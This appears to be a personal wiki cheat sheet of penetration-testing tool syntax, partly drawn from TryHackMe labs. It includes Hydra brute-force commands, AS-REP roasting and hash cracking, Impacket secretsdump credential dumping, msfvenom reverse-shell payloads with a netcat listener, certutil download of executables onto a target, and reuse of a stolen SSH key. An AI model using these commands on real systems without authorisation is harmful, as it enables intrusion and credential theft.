====== Various Tools & Their Syntax ======
===== Apache =====
Start a simple web server in Kali:
service apache2 start
# default landing dir: /var/www/html
# To stop/kill the serveer:
service apache2 stop
# To check Apache status:
service apache2 status
Place files you want to transfer to the target machine in the ''/var/www/html/'' directory. Then from the target machine, access via html (browser, etc.) and download the files.
----
===== certutil =====
In Windows, use certutil from the CLI to download files (like wget in Linux):
certutil -urlcache -f http://[target ip]/filename.exe filename.exe
With the ''-f'' option, ''-urlcache'' forces fetching a specific URL and updating the cache.
Resource: [[https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil#-urlcache | documentation]]
----
===== curl =====
Download the home/index page from a site:
curl http://[target ip]
Upload a file using PUT:
curl http://[target ip/[subdir] --upload-file gk_put.txt # or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
**Note:** ''-X PUT'' is redundant when using ''-T'' (which is short for ''--upload-file'')
----
===== dig =====
The DNS (Domain Name System) maps IP addresses to domain names.
When you plug a domain name in your browser URI box...
- **Local cache** is checked first for a valid mapping to an IP. TTL (measured in seconds) defines the length of time a mapping in cache is considered valid. If not found...
- Your router sends the request to a **//recursive// DNS server** (usually your ISP or OpenDNS, etc.). If not found...
- The recursive server passes the request to a **//root name// server.** Root name servers (13 unique IP addresses for them) keep track of the DNS servers in the next level down: top-level domain servers.
- **//Top-Level Domain// (TLD) Servers** are split up by extensions (.com, .org, .co.uk, etc.). TLD servers keep track of DNS servers one level down: authoritative name servers.
- **//Authoritative// name servers** are used to store DNS records for domains directly (the buck stops here). The IP mapped to the domain name you requested is sent back to you and your browser uses it to access the website you want to go to.
This whole process is automagic with browsers but **dig** can do all this manually (and show us the results).
**Syntax:**
dig [domain] @[dns-server-ip]
# Example:
dig google.com @1.1.1.1
----
===== GoBuster =====
GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.
You need a wordlist. In Kali: ''/usr/share/wordlists''
**Run GoBuster with a wordlist:**
gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]
**Flags:**
^ Flag ^ Description ^
| -e | Print the full URLs in your console |
| -u | The target URL |
| -w | Path to your wordlist |
| -U and -P | Username and Password for Basic Auth |
| -p | Proxy to use for requests |
| -c | Specify a cookie for simulating your auth |
----
===== grep =====
grep for a "string" in all the files from root (/) or whatever directory you want
grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null
Options:
* ''-r'' : recursive; read all files under each directory, recursively
* ''-n'' : number; Prefix each line of output with the 1-based line number within its input file.
* ''-w'' : whole words; select only those lines containing matches that form whole words
* ''-e [pattern]'' : expression; search for all patterns given; protect pattern with "quotes"
''2>/dev/null'' sends STDERR to the abyss instead of to the screen.
----
===== HashCat =====
A password recovery tool...
**Example Syntax:**
* Three of the most important options are:
* ''-m'' Mode: the hash type, from the table in the help file
* ''-a'' Attack-Mode: from a smaller table in the help file
* ''-o'' Output file (so you don't have to do a ''--show'' later)
hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m mode for Kerberos 5, etype 23, AS-REP
# -a straight (i.e., dictionary) attack mode; default attack mode
# -o output file name cracked.txt
If you forget to put in the ''-o'' for an output file, you'll need to use the same command you used to crack the password and add ''--show'' to it.
HashCat Wiki for help: [[https://hashcat.net/wiki/ | here]].
----
===== Hydra =====
Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
* [[https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack | Usage & Examples]]
Specify a single username and single password to try (lower case ''l'' and ''p''):
hydra -l [user] -p [password] [target IP] [ftp | ssh | etc]
Specify lists of users and/or passwords to try (upper case ''l'' and ''p''):
hydra -L [/path/to/users.txt] -P [/path/to/passwords.txt] -vV [target IP] [ftp | ssh | etc]
**Options:**
* ''-t 4'' : number of parallel connections per target
* ''-l [user]'' : single username of the account we are trying to compromise
* ''-p [password]'' : single password to try
* ''-L [/path/to/]'' : plaintext file containing possible usernames
* ''-P [/path/to/]'' : plaintext file containing possible passwords
* ''-vV'' : Very verbose: login+pass combo for each attempt
* ''[ftp | ssh | etc]'' : Sets the protocol (see "supported services" below)
Be very careful with your brute-force speed. You could crash the system or DoS it.
* The ''-t'' (tasks) options sets the number of connects in parallel (default is 16, for reference).
* You could set ''-t 2'' or ''-t 3'' and see if that plays nicer.
* Hydra actually recommends ''-t 1'' through ''-t 4''.
**SMB:**
hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb
**SSH:**
hydra -l student -P rockyou.txt [ip] ssh
**MySQL:**
hydra -l root -P /usr/share/metasploit_framework/data/wordlists/unix_passwords.txt [target ip] mysql
**WebDAV (http login):**
hydra -L /.../common-users.txt -P /.../common-passwords.txt [target ip] http-get /webdav/
# http-get : Indicates the protocol to be used
# /webdav/ : Indicates the directory where hydra can find the authentication mechanism
**RDP:**
hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
# -s : service port (if different than the default)
**Supported services:**
* adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird
* **ftp[s]**
* http[s]-{head|get|post}
* http[s]-{get|post}-form
* http-proxy http-proxy-urlenum
* icq imap[s] irc
* ldap2[s] ldap3[-{cram|digest}md5][s]
* memcached mongodb mssql mysql nntp
* oracle-listener oracle-sid
* pcanywhere pcnfs pop3[s] postgres
* radmin2 **rdp** redis rexec rlogin rpcap rsh rtsp
* s7-300 sip **smb** smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
* telnet[s] vmauthd vnc xmpp
----
===== Kerberos =====
Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption.
* Attack [[https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a | Cheat Sheet]]
**Attack Privilege Requirements:**
^ Kerbrute Enumeration | No domain access required |
^ Pass the Ticket | Access as a user to the domain required |
^ Kerberoasting | Access as any user required |
^ AS-REP Roasting | Access as any user required |
^ Golden Ticket | Full domain compromise (domain admin) required |
^ Silver Ticket | Service hash required |
^ Skeleton Key | Full domain compromise (domain admin) required |
==== Kerbrute ====
[[https://github.com/ropnop/kerbrute | Kerbrute]] is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
* [[https://github.com/ropnop/kerbrute/releases/tag/v1.0.3 | Download]] the binary for your machine.
* ''chmod 777 [binary name]'' to make it executable.
Commands:
# to get the general help screen:
./kerbrute
# to get the help screen for a specific command:
./kerbrute [command name] -h
# specific help example:
./kerbrute userenum -h
# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt
# enumerate AD usernames example:
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt
# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt
[[https://salmonsec.com/blogs/tryhackme_attacktive_directory | Here]] are some usage examples.
===== IMPacket =====
Found in Kali here: ''/usr/share/doc/python3-impacket/examples''
==== GetNPUsers.py ====
Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.
* [[https://wadcoms.github.io/wadcoms/Impacket-GetNPUsers/ | Explanation & Example Syntax]]
# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/
# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/
# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
----
==== secretsdump.py ====
Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [ [[https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/ | Source]]. ]
**Command:**
python3 secretsdump.py test.local/john:password123@10.10.10.1
Some how-to stuff on interpreting the output: [[https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b | here]].
**Example:**
# |-- colon separated values
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# |-- username | | |
# |-- RID (Relative ID) | |
# |-- LM (LAN Manager) Hash |
# Old & Deprecated |
# |-- NTLM Hash (for
# Pass-the-Hash)
----
===== msfvenom =====
To see the available payloads: ''msfvenom -l payloads'' (filter by piping to grep)
* [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]
First, build a payload with MSFVenom (e.g., a reverse shell payload):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
#
# -p = payload
# LHOST = local host IP address (this is your machine's IP address)
# LPORT = local port to listen on (this is the port on your machine)
# -f = format (of the output)
# R = export the payload in raw format
A **staged** payload will follow this syntax (note the delimiter):
* ''windows/x64/meterpreter/reverse_tcp''
* ''linux/x86/meterpreter/reverse_tcp''
A **non-staged** payload will follow this syntax:
* ''windows/x64/meterpreter_reverse_tcp''
* ''linux/x86/meterpreter_reverse_tcp''
After that set up a listener on your attach machine:
nc -nvlp [listening port]
Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.
----
===== net commands (Windows) =====
stuff
1
----
===== ping =====
Ping Multiple IPs -- One-Liners...
**Windows:**
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"
How it works:
* ''FOR /L %i IN (1, 1, 254)'' : Create a loop from 1 to 254, the range of valid IPs a 192.168.0.0/24 network.
* ''DO ping -n 1 192.168.1.%i'' : Follow the FOR loop by the ping command to execute on each iteration.
* ''| FIND /i "Reply"'' : filter to display only replies (kinda hinky, might need to tweak this a bit)
Redirect output to a file with: ''> filename.txt''
**Linux:**
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done
How it works:
* ''for ip in $(seq 1 254);'' : create a loop from one to 254.
* ''do ping -c 1 192.168.1.$ip; done'' : ping the IP address, substituting the loop variable for the last part of the address, and then end the statement.
Redirect output to a file with: ''> filename.txt''
Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html
----
===== SSH =====
==== Syntax ====
ssh [user_name]@[host] # host can be either IP or domain name
# OR
ssh -i [key-file] [user_name]@[host]
The default **Key Name** is ''id_rsa''.
* The private key: ''~/.ssh/id_rsa''
* The public key: ''~/.ssh/id_rsa.pub''
**Note:** You need to ''chmod 600 id_rsa'' in order for the file to be usable in a session.
If you can obtain the ''id_rsa'' file of a target, just put it in your ''~/.ssh'' directory and ssh into the target machine. Or reference the key file with the ''-i'' switch if you put it in another directory somewhere.
==== Copy via SSH ====
**Syntax:**
scp [source] [destination]
**Examples:**
To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination
# [source] [destination]
To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination
# [source] [destination]
----
===== tcpdump =====
**Listener:** To listen to an interface on my local machine and see if a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?)...
tcpdump ip proto \\icmp -i [interface name: eth0, tun0, etc.]
----